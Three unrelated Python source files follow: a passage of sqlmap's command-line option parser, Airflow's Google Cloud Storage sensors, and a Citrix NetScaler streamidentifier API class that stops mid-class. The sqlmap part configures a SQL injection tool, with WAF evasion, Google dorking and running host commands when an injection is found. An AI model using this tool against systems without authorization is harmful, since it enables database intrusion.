general.add_option("--fresh-queries", dest="freshQueries",
action="store_true",
help="Ignore query results stored in session file")
general.add_option("--hex", dest="hexConvert",
action="store_true",
help="Use DBMS hex function(s) for data retrieval")
general.add_option("--output-dir", dest="outputDir",
action="store",
help="Custom output directory path")
general.add_option("--parse-errors", dest="parseErrors",
action="store_true",
help="Parse and display DBMS error messages from responses")
general.add_option("--save", dest="saveConfig",
help="Save options to a configuration INI file")
general.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log")
general.add_option("--test-filter", dest="testFilter",
help="Select tests by payloads and/or titles (e.g. ROW)")
general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll",
action="store_true",
help="Update sqlmap")
# Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("-z", dest="mnemonics",
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
miscellaneous.add_option("--alert", dest="alert",
help="Run host OS command(s) when SQL injection is found")
miscellaneous.add_option("--answers", dest="answers",
help="Set question answers (e.g. \"quit=N,follow=N\")")
miscellaneous.add_option("--beep", dest="beep", action="store_true",
help="Beep on question and/or when SQL injection is found")
miscellaneous.add_option("--cleanup", dest="cleanup",
action="store_true",
help="Clean up the DBMS from sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--dependencies", dest="dependencies",
action="store_true",
help="Check for missing (non-core) sqlmap dependencies")
miscellaneous.add_option("--disable-coloring", dest="disableColoring",
action="store_true",
help="Disable console output coloring")
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--skip-waf", dest="skipWaf",
action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile",
action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
miscellaneous.add_option("--offline", dest="offline",
action="store_true",
help="Work in offline mode (only use session data)")
miscellaneous.add_option("--page-rank", dest="pageRank",
action="store_true",
help="Display page rank (PR) for Google dork results")
miscellaneous.add_option("--purge-output", dest="purgeOutput",
action="store_true",
help="Safely remove all content from output directory")
miscellaneous.add_option("--smart", dest="smart",
action="store_true",
help="Conduct thorough tests only if positive heuristic(s)")
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
help="Prompt for an interactive sqlmap shell")
miscellaneous.add_option("--wizard", dest="wizard",
action="store_true",
help="Simple wizard interface for beginner users")
# Hidden and/or experimental options
parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
parser.add_option("--disable-precon", dest="disablePrecon", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--live-test", dest="liveTest", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--stop-fail", dest="stopFail", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(optimization)
parser.add_option_group(injection)
parser.add_option_group(detection)
parser.add_option_group(techniques)
parser.add_option_group(fingerprint)
parser.add_option_group(enumeration)
parser.add_option_group(brute)
parser.add_option_group(udf)
parser.add_option_group(filesystem)
parser.add_option_group(takeover)
parser.add_option_group(windows)
parser.add_option_group(general)
parser.add_option_group(miscellaneous)
# Dirty hack to display longer options without breaking into two lines
def _(self, *args):
retVal = parser.formatter._format_option_strings(*args)
if len(retVal) > MAX_HELP_OPTION_LENGTH:
retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal
return retVal
parser.formatter._format_option_strings = parser.formatter.format_option_strings
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))
# Dirty hack for making a short option -hh
option = parser.get_option("--hh")
option._short_opts = ["-hh"]
option._long_opts = []
# Dirty hack for inherent help message of switch -h
option = parser.get_option("-h")
option.help = option.help.capitalize().replace("this help", "basic help")
_ = []
prompt = False
advancedHelp = True
extraHeaders = []
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
argv = _
checkDeprecatedOptions(argv)
prompt = "--sqlmap-shell" in argv
if prompt:
parser.usage = ""
cmdLineOptions.sqlmapShell = True
_ = ["x", "q", "exit", "quit", "clear"]
for option in parser.option_list:
_.extend(option._long_opts)
_.extend(option._short_opts)
for group in parser.option_groups:
for option in group.option_list:
_.extend(option._long_opts)
_.extend(option._short_opts)
autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
while True:
command = None
try:
command = raw_input("sqlmap-shell> ").strip()
command = getUnicode(command, encoding=sys.stdin.encoding)
except (KeyboardInterrupt, EOFError):
print
raise SqlmapShellQuitException
if not command:
continue
elif command.lower() == "clear":
clearHistory()
print "[i] history cleared"
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
elif command.lower() in ("x", "q", "exit", "quit"):
raise SqlmapShellQuitException
elif command[0] != '-':
print "[!] invalid option(s) provided"
print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
else:
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
break
try:
for arg in shlex.split(command):
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
# Hide non-basic options in basic help case
for i in xrange(len(argv)):
if argv[i] == "-hh":
argv[i] = "-h"
elif re.search(r"\A-\w=.+", argv[i]):
print "[!] potentially miswritten (illegal '=') short option detected ('%s')" % argv[i]
elif argv[i] == "-H":
if i + 1 < len(argv):
extraHeaders.append(argv[i + 1])
elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
argv[i] = argv[i][:-1]
conf.skipThreadCheck = True
elif argv[i] == "--version":
print VERSION_STRING.split('/')[-1]
raise SystemExit
elif argv[i] == "-h":
advancedHelp = False
for group in parser.option_groups[:]:
found = False
for option in group.option_list:
if option.dest not in BASIC_HELP_ITEMS:
option.help = SUPPRESS_HELP
else:
found = True
if not found:
parser.option_groups.remove(group)
try:
(args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex:
print "\n[!] %s" % ex.object.encode("unicode-escape")
raise SystemExit
except SystemExit:
if "-h" in argv and not advancedHelp:
print "\n[!] to see full list of options run with '-hh'"
raise
if extraHeaders:
if not args.headers:
args.headers = ""
delimiter = "\\n" if "\\n" in args.headers else "\n"
args.headers += delimiter + delimiter.join(extraHeaders)
# Expand given mnemonic options (e.g. -z "ign,flu,bat")
for i in xrange(len(argv) - 1):
if argv[i] == "-z":
expandMnemonics(argv[i + 1], parser, args)
if args.dummy:
args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help"
parser.error(errMsg)
return args
except (OptionError, TypeError), e:
parser.error(e)
except SystemExit:
# Protection against Windows dummy double clicking
if IS_WIN:
print "\nPress Enter to continue...",
raw_input()
raise
debugMsg = "parsing command line"
logger.debug(debugMsg)
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains Google Cloud Storage sensors."""
import os
from datetime import datetime
from typing import Callable, List, Optional, Sequence, Set, Union
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.gcs import GCSHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator, poke_mode_only
from airflow.utils.decorators import apply_defaults
class GCSObjectExistenceSensor(BaseSensorOperator):
    """
    Waits until a given object exists in a Google Cloud Storage bucket.

    :param bucket: Google Cloud Storage bucket containing the object.
    :type bucket: str
    :param object: Name of the object to look for in the bucket.
    :type object: str
    :param google_cloud_conn_id: Connection ID used when talking to
        Google Cloud Storage.
    :type google_cloud_conn_id: str
    :param delegate_to: Account to impersonate via domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled for this to work.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to
        obtain the access_token of the last account in the list, which is
        impersonated in the request. As a string, that account must grant the
        originating account the Service Account Token Creator IAM role. As a
        sequence, each identity must grant that role to the directly preceding
        identity, with the first account granting it to the originating
        account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = ('bucket', 'object', 'impersonation_chain')
    ui_color = '#f0eee4'

    @apply_defaults
    def __init__(
        self,
        *,
        bucket: str,
        object: str,  # pylint: disable=redefined-builtin
        google_cloud_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.bucket = bucket
        self.object = object
        self.google_cloud_conn_id = google_cloud_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain

    def poke(self, context: dict) -> bool:
        # Each poke performs exactly one existence check against GCS.
        self.log.info('Sensor checks existence of : %s, %s', self.bucket, self.object)
        gcs_hook = GCSHook(
            google_cloud_storage_conn_id=self.google_cloud_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        return gcs_hook.exists(self.bucket, self.object)
def ts_function(context):
    """
    Default update-condition callback for the object-updated sensor.

    Returns the schedule point following the current ``execution_date``
    (i.e. execution_date + schedule_interval), as computed by the DAG.
    """
    dag = context['dag']
    execution_date = context['execution_date']
    return dag.following_schedule(execution_date)
class GCSObjectUpdateSensor(BaseSensorOperator):
    """
    Waits for an object in a Google Cloud Storage bucket to be updated.

    :param bucket: Google Cloud Storage bucket containing the object.
    :type bucket: str
    :param object: Name of the object to watch in the bucket.
    :type object: str
    :param ts_func: Callback that computes the update condition from the task
        context. The default returns execution_date + schedule_interval.
    :type ts_func: function
    :param google_cloud_conn_id: Connection ID used when talking to
        Google Cloud Storage.
    :type google_cloud_conn_id: str
    :param delegate_to: Account to impersonate via domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled for this to work.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to
        obtain the access_token of the last account in the list, which is
        impersonated in the request. As a string, that account must grant the
        originating account the Service Account Token Creator IAM role. As a
        sequence, each identity must grant that role to the directly preceding
        identity, with the first account granting it to the originating
        account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = ('bucket', 'object', 'impersonation_chain')
    ui_color = '#f0eee4'

    @apply_defaults
    def __init__(
        self,
        bucket: str,
        object: str,  # pylint: disable=redefined-builtin
        ts_func: Callable = ts_function,
        google_cloud_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.bucket = bucket
        self.object = object
        self.ts_func = ts_func
        self.google_cloud_conn_id = google_cloud_conn_id
        self.delegate_to = delegate_to
        self.impersonation_chain = impersonation_chain

    def poke(self, context: dict) -> bool:
        self.log.info('Sensor checks existence of : %s, %s', self.bucket, self.object)
        gcs_hook = GCSHook(
            google_cloud_storage_conn_id=self.google_cloud_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        # True once the object's update time is later than ts_func(context).
        return gcs_hook.is_updated_after(self.bucket, self.object, self.ts_func(context))
class GCSObjectsWtihPrefixExistenceSensor(BaseSensorOperator):
    """
    Waits for GCS objects matching a prefix, exposing the matches via XCom.

    As soon as at least one object with the given prefix exists in the bucket,
    the poke criterion is satisfied; :meth:`execute` then returns the list of
    matching object names, which is pushed to XCom for downstream tasks.

    NOTE(review): "Wtih" in the class name is a typo, kept because renaming
    would break existing callers.

    :param bucket: Google Cloud Storage bucket to search.
    :type bucket: str
    :param prefix: Object-name prefix to look for in the bucket.
    :type prefix: str
    :param google_cloud_conn_id: Connection ID used when talking to
        Google Cloud Storage.
    :type google_cloud_conn_id: str
    :param delegate_to: Account to impersonate via domain-wide delegation of
        authority, if any. The service account making the request must have
        domain-wide delegation enabled for this to work.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using
        short-term credentials, or a chained list of accounts required to
        obtain the access_token of the last account in the list, which is
        impersonated in the request. As a string, that account must grant the
        originating account the Service Account Token Creator IAM role. As a
        sequence, each identity must grant that role to the directly preceding
        identity, with the first account granting it to the originating
        account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = ('bucket', 'prefix', 'impersonation_chain')
    ui_color = '#f0eee4'

    @apply_defaults
    def __init__(
        self,
        bucket: str,
        prefix: str,
        google_cloud_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.bucket = bucket
        self.prefix = prefix
        self.google_cloud_conn_id = google_cloud_conn_id
        self.delegate_to = delegate_to
        # Populated by poke(); handed to downstream tasks by execute().
        self._matches: List[str] = []
        self.impersonation_chain = impersonation_chain

    def poke(self, context: dict) -> bool:
        self.log.info('Sensor checks existence of objects: %s, %s', self.bucket, self.prefix)
        gcs_hook = GCSHook(
            google_cloud_storage_conn_id=self.google_cloud_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        self._matches = gcs_hook.list(self.bucket, prefix=self.prefix)
        return bool(self._matches)

    def execute(self, context: dict) -> List[str]:
        """Run the sensor, then return the matched object names."""
        super().execute(context)
        return self._matches
def get_time():
    """
    Thin wrapper around ``datetime.now`` so unit tests can mock the
    clock easily.
    """
    now = datetime.now()
    return now
@poke_mode_only
class GCSUploadSessionCompleteSensor(BaseSensorOperator):
    """
    Checks for changes in the number of objects at prefix in Google Cloud Storage
    bucket and returns True if the inactivity period has passed with no
    increase in the number of objects. Note, this sensor will not behave correctly
    in reschedule mode, as the state of the listed objects in the GCS bucket will
    be lost between rescheduled invocations.

    :param bucket: The Google Cloud Storage bucket where the objects are
        expected.
    :type bucket: str
    :param prefix: The name of the prefix to check in the Google cloud
        storage bucket.
    :param inactivity_period: The total seconds of inactivity to designate
        an upload session is over. Note, this mechanism is not real time and
        this operator may not return until a poke_interval after this period
        has passed with no additional objects sensed.
    :type inactivity_period: float
    :param min_objects: The minimum number of objects needed for upload session
        to be considered valid.
    :type min_objects: int
    :param previous_objects: The set of object ids found during the last poke.
    :type previous_objects: set[str]
    :param allow_delete: Should this sensor consider objects being deleted
        between pokes valid behavior. If true a warning message will be logged
        when this happens. If false an error will be raised.
    :type allow_delete: bool
    :param google_cloud_conn_id: The connection ID to use when connecting
        to Google Cloud Storage.
    :type google_cloud_conn_id: str
    :param delegate_to: The account to impersonate using domain-wide delegation of authority,
        if any. For this to work, the service account making the request must have
        domain-wide delegation enabled.
    :type delegate_to: str
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :type impersonation_chain: Union[str, Sequence[str]]
    """

    template_fields = (
        'bucket',
        'prefix',
        'impersonation_chain',
    )
    ui_color = '#f0eee4'

    @apply_defaults
    def __init__(
        self,
        bucket: str,
        prefix: str,
        inactivity_period: float = 60 * 60,
        min_objects: int = 1,
        previous_objects: Optional[Set[str]] = None,
        allow_delete: bool = True,
        google_cloud_conn_id: str = 'google_cloud_default',
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        self.bucket = bucket
        self.prefix = prefix
        if inactivity_period < 0:
            raise ValueError("inactivity_period must be non-negative")
        self.inactivity_period = inactivity_period
        self.min_objects = min_objects
        # Carry over state from a previous run if the caller supplied it.
        self.previous_objects = previous_objects if previous_objects else set()
        # Seconds elapsed since the last observed change in the object set.
        self.inactivity_seconds = 0
        self.allow_delete = allow_delete
        self.google_cloud_conn_id = google_cloud_conn_id
        self.delegate_to = delegate_to
        # Wall-clock time of the last observed change; None until first poke.
        self.last_activity_time = None
        self.impersonation_chain = impersonation_chain
        self.hook: Optional[GCSHook] = None  # created lazily in _get_gcs_hook

    def _get_gcs_hook(self) -> Optional[GCSHook]:
        # Build the hook once and cache it so repeated pokes reuse it.
        if not self.hook:
            self.hook = GCSHook(
                gcp_conn_id=self.google_cloud_conn_id,
                delegate_to=self.delegate_to,
                impersonation_chain=self.impersonation_chain,
            )
        return self.hook

    def is_bucket_updated(self, current_objects: Set[str]) -> bool:
        """
        Checks whether new objects have been uploaded and the inactivity_period
        has passed and updates the state of the sensor accordingly.

        :param current_objects: set of object ids in bucket during last poke.
        :type current_objects: set[str]
        """
        current_num_objects = len(current_objects)
        # NOTE(review): ">" is a strict-superset test. If objects were both
        # added AND removed since the last poke this branch is skipped and
        # the change is handled as a deletion below — confirm that is the
        # intended behavior.
        if current_objects > self.previous_objects:
            # When new objects arrived, reset the inactivity_seconds
            # and update previous_objects for the next poke.
            self.log.info(
                "New objects found at %s resetting last_activity_time.",
                os.path.join(self.bucket, self.prefix),
            )
            self.log.debug("New objects: %s", "\n".join(current_objects - self.previous_objects))
            self.last_activity_time = get_time()
            self.inactivity_seconds = 0
            self.previous_objects = current_objects
            return False
        # Capture the diff BEFORE previous_objects is overwritten below;
        # the original code computed it after the overwrite, so the warning
        # always logged an empty set.
        removed_objects = self.previous_objects - current_objects
        if removed_objects:
            # During the last poke interval objects were deleted.
            if self.allow_delete:
                self.previous_objects = current_objects
                self.last_activity_time = get_time()
                self.log.warning(
                    """
                    Objects were deleted during the last
                    poke interval. Updating the file counter and
                    resetting last_activity_time.
                    %s
                    """,
                    removed_objects,
                )
                return False
            raise AirflowException(
                """
                Illegal behavior: objects were deleted in {} between pokes.
                """.format(
                    os.path.join(self.bucket, self.prefix)
                )
            )
        if self.last_activity_time:
            self.inactivity_seconds = (get_time() - self.last_activity_time).total_seconds()
        else:
            # Handles the first poke where last inactivity time is None.
            self.last_activity_time = get_time()
            self.inactivity_seconds = 0
        if self.inactivity_seconds >= self.inactivity_period:
            path = os.path.join(self.bucket, self.prefix)
            if current_num_objects >= self.min_objects:
                self.log.info(
                    """SUCCESS:
                    Sensor found %s objects at %s.
                    Waited at least %s seconds, with no new objects dropped.
                    """,
                    current_num_objects,
                    path,
                    self.inactivity_period,
                )
                return True
            self.log.error("FAILURE: Inactivity Period passed, not enough objects found in %s", path)
            return False
        return False

    def poke(self, context: dict) -> bool:
        # One poke: list the objects under the prefix and feed the set into
        # the state machine above.
        return self.is_bucket_updated(
            set(self._get_gcs_hook().list(self.bucket, prefix=self.prefix))  # type: ignore[union-attr]
        )
| |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class streamidentifier(base_resource) :
    """ Configuration for identifier resource. """
    def __init__(self) :
        # Writable attributes sent to the NITRO API.
        self._name = ""
        self._selectorname = ""
        self._interval = 0
        self._samplecount = 0
        self._sort = ""
        # Read-only attribute populated from API responses.
        self._rule = []
        # Triple-underscore count slot filled in by count()/count_filtered()
        # responses (accessed via __dict__['___count']).
        self.___count = 0
    @property
    def name(self) :
        """The name of stream identifier.
        """
        try :
            return self._name
        except Exception as e:
            raise e
    @name.setter
    def name(self, name) :
        """The name of stream identifier.
        """
        try :
            self._name = name
        except Exception as e:
            raise e
    @property
    def selectorname(self) :
        """Name of the selector to use with the stream identifier.<br/>Minimum length = 1.
        """
        try :
            return self._selectorname
        except Exception as e:
            raise e
    @selectorname.setter
    def selectorname(self, selectorname) :
        """Name of the selector to use with the stream identifier.<br/>Minimum length = 1
        """
        try :
            self._selectorname = selectorname
        except Exception as e:
            raise e
    @property
    def interval(self) :
        """Number of minutes of data to use when calculating session statistics (number of requests, bandwidth, and response times). The interval is a moving window that keeps the most recently collected data. Older data is discarded at regular intervals.<br/>Default value: 1<br/>Minimum length = 1.
        """
        try :
            return self._interval
        except Exception as e:
            raise e
    @interval.setter
    def interval(self, interval) :
        """Number of minutes of data to use when calculating session statistics (number of requests, bandwidth, and response times). The interval is a moving window that keeps the most recently collected data. Older data is discarded at regular intervals.<br/>Default value: 1<br/>Minimum length = 1
        """
        try :
            self._interval = interval
        except Exception as e:
            raise e
    @property
    def samplecount(self) :
        """Size of the sample from which to select a request for evaluation. The smaller the sample count, the more accurate is the statistical data. To evaluate all requests, set the sample count to 1. However, such a low setting can result in excessive consumption of memory and processing resources.<br/>Default value: 1<br/>Minimum length = 1<br/>Maximum length = 65535.
        """
        try :
            return self._samplecount
        except Exception as e:
            raise e
    @samplecount.setter
    def samplecount(self, samplecount) :
        """Size of the sample from which to select a request for evaluation. The smaller the sample count, the more accurate is the statistical data. To evaluate all requests, set the sample count to 1. However, such a low setting can result in excessive consumption of memory and processing resources.<br/>Default value: 1<br/>Minimum length = 1<br/>Maximum length = 65535
        """
        try :
            self._samplecount = samplecount
        except Exception as e:
            raise e
    @property
    def sort(self) :
        """Sort stored records by the specified statistics column, in descending order. Performed during data collection, the sorting enables real-time data evaluation through NetScaler policies (for example, compression and caching policies) that use functions such as IS_TOP(n).<br/>Default value: REQUESTS<br/>Possible values = REQUESTS, CONNECTIONS, RESPTIME, BANDWIDTH, NONE.
        """
        try :
            return self._sort
        except Exception as e:
            raise e
    @sort.setter
    def sort(self, sort) :
        """Sort stored records by the specified statistics column, in descending order. Performed during data collection, the sorting enables real-time data evaluation through NetScaler policies (for example, compression and caching policies) that use functions such as IS_TOP(n).<br/>Default value: REQUESTS<br/>Possible values = REQUESTS, CONNECTIONS, RESPTIME, BANDWIDTH, NONE
        """
        try :
            self._sort = sort
        except Exception as e:
            raise e
    @property
    def rule(self) :
        """Rule.
        """
        try :
            return self._rule
        except Exception as e:
            raise e
    def _get_nitro_response(self, service, response) :
        """ converts nitro response into object and returns the object array in case of get request.
        """
        try :
            result = service.payload_formatter.string_to_resource(streamidentifier_response, response, self.__class__.__name__)
            if(result.errorcode != 0) :
                # Error code 444 indicates an expired/invalid session:
                # drop the cached session before propagating the error.
                if (result.errorcode == 444) :
                    service.clear_session(self)
                if result.severity :
                    if (result.severity == "ERROR") :
                        raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
                else :
                    raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
            return result.streamidentifier
        except Exception as e :
            raise e
    def _get_object_name(self) :
        """ Returns the value of object identifier argument
        """
        try :
            if (self.name) :
                return str(self.name)
            return None
        except Exception as e :
            raise e
    @classmethod
    def add(cls, client, resource) :
        """ Use this API to add streamidentifier.
        """
        try :
            # Single resource and list-of-resources are both supported;
            # lists are sent as one bulk request.
            if type(resource) is not list :
                addresource = streamidentifier()
                addresource.name = resource.name
                addresource.selectorname = resource.selectorname
                addresource.interval = resource.interval
                addresource.samplecount = resource.samplecount
                addresource.sort = resource.sort
                return addresource.add_resource(client)
            else :
                if (resource and len(resource) > 0) :
                    addresources = [ streamidentifier() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        addresources[i].name = resource[i].name
                        addresources[i].selectorname = resource[i].selectorname
                        addresources[i].interval = resource[i].interval
                        addresources[i].samplecount = resource[i].samplecount
                        addresources[i].sort = resource[i].sort
                result = cls.add_bulk_request(client, addresources)
                return result
        except Exception as e :
            raise e
    @classmethod
    def update(cls, client, resource) :
        """ Use this API to update streamidentifier.
        """
        try :
            if type(resource) is not list :
                updateresource = streamidentifier()
                updateresource.name = resource.name
                updateresource.selectorname = resource.selectorname
                updateresource.interval = resource.interval
                updateresource.samplecount = resource.samplecount
                updateresource.sort = resource.sort
                return updateresource.update_resource(client)
            else :
                if (resource and len(resource) > 0) :
                    updateresources = [ streamidentifier() for _ in range(len(resource))]
                    for i in range(len(resource)) :
                        updateresources[i].name = resource[i].name
                        updateresources[i].selectorname = resource[i].selectorname
                        updateresources[i].interval = resource[i].interval
                        updateresources[i].samplecount = resource[i].samplecount
                        updateresources[i].sort = resource[i].sort
                result = cls.update_bulk_request(client, updateresources)
                return result
        except Exception as e :
            raise e
    @classmethod
    def unset(cls, client, resource, args) :
        """ Use this API to unset the properties of streamidentifier resource.
        Properties that need to be unset are specified in args array.
        """
        try :
            # 'resource' may be a name string, a streamidentifier object,
            # or a list of either; the branches below normalize all cases.
            if type(resource) is not list :
                unsetresource = streamidentifier()
                if type(resource) !=  type(unsetresource):
                    unsetresource.name = resource
                else :
                    unsetresource.name = resource.name
                return unsetresource.unset_resource(client, args)
            else :
                if type(resource[0]) != cls :
                    if (resource and len(resource) > 0) :
                        unsetresources = [ streamidentifier() for _ in range(len(resource))]
                        for i in range(len(resource)) :
                            unsetresources[i].name = resource[i]
                else :
                    if (resource and len(resource) > 0) :
                        unsetresources = [ streamidentifier() for _ in range(len(resource))]
                        for i in range(len(resource)) :
                            unsetresources[i].name = resource[i].name
                result = cls.unset_bulk_request(client, unsetresources, args)
                return result
        except Exception as e :
            raise e
    @classmethod
    def delete(cls, client, resource) :
        """ Use this API to delete streamidentifier.
        """
        try :
            # Accepts a name string, a resource object, or a list of either.
            if type(resource) is not list :
                deleteresource = streamidentifier()
                if type(resource) != type(deleteresource):
                    deleteresource.name = resource
                else :
                    deleteresource.name = resource.name
                return deleteresource.delete_resource(client)
            else :
                if type(resource[0]) != cls :
                    if (resource and len(resource) > 0) :
                        deleteresources = [ streamidentifier() for _ in range(len(resource))]
                        for i in range(len(resource)) :
                            deleteresources[i].name = resource[i]
                else :
                    if (resource and len(resource) > 0) :
                        deleteresources = [ streamidentifier() for _ in range(len(resource))]
                        for i in range(len(resource)) :
                            deleteresources[i].name = resource[i].name
                result = cls.delete_bulk_request(client, deleteresources)
                return result
        except Exception as e :
            raise e
    @classmethod
    def get(cls, client, name="", option_="") :
        """ Use this API to fetch all the streamidentifier resources that are configured on netscaler.
        """
        try :
            # No name: fetch every configured resource. A name or list of
            # names: fetch each named resource individually.
            if not name :
                obj = streamidentifier()
                response = obj.get_resources(client, option_)
            else :
                if type(name) != cls :
                    if type(name) is not list :
                        obj = streamidentifier()
                        obj.name = name
                        response = obj.get_resource(client, option_)
                    else :
                        if name and len(name) > 0 :
                            response = [streamidentifier() for _ in range(len(name))]
                            obj = [streamidentifier() for _ in range(len(name))]
                            for i in range(len(name)) :
                                obj[i] = streamidentifier()
                                obj[i].name = name[i]
                                response[i] = obj[i].get_resource(client, option_)
            return response
        except Exception as e :
            raise e
    @classmethod
    def get_filtered(cls, client, filter_) :
        """ Use this API to fetch filtered set of streamidentifier resources.
        filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
        """
        try :
            obj = streamidentifier()
            option_ = options()
            option_.filter = filter_
            response = obj.getfiltered(client, option_)
            return response
        except Exception as e :
            raise e
    @classmethod
    def count(cls, client) :
        """ Use this API to count the streamidentifier resources configured on NetScaler.
        """
        try :
            obj = streamidentifier()
            option_ = options()
            option_.count = True
            response = obj.get_resources(client, option_)
            # The count travels in the name-mangled '___count' attribute of
            # the first response element.
            if response :
                return response[0].__dict__['___count']
            return 0
        except Exception as e :
            raise e
    @classmethod
    def count_filtered(cls, client, filter_) :
        """ Use this API to count filtered the set of streamidentifier resources.
        Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
        """
        try :
            obj = streamidentifier()
            option_ = options()
            option_.count = True
            option_.filter = filter_
            response = obj.getfiltered(client, option_)
            if response :
                return response[0].__dict__['___count']
            return 0
        except Exception as e :
            raise e

    # Allowed values for the 'sort' attribute.
    class Sort:
        REQUESTS = "REQUESTS"
        CONNECTIONS = "CONNECTIONS"
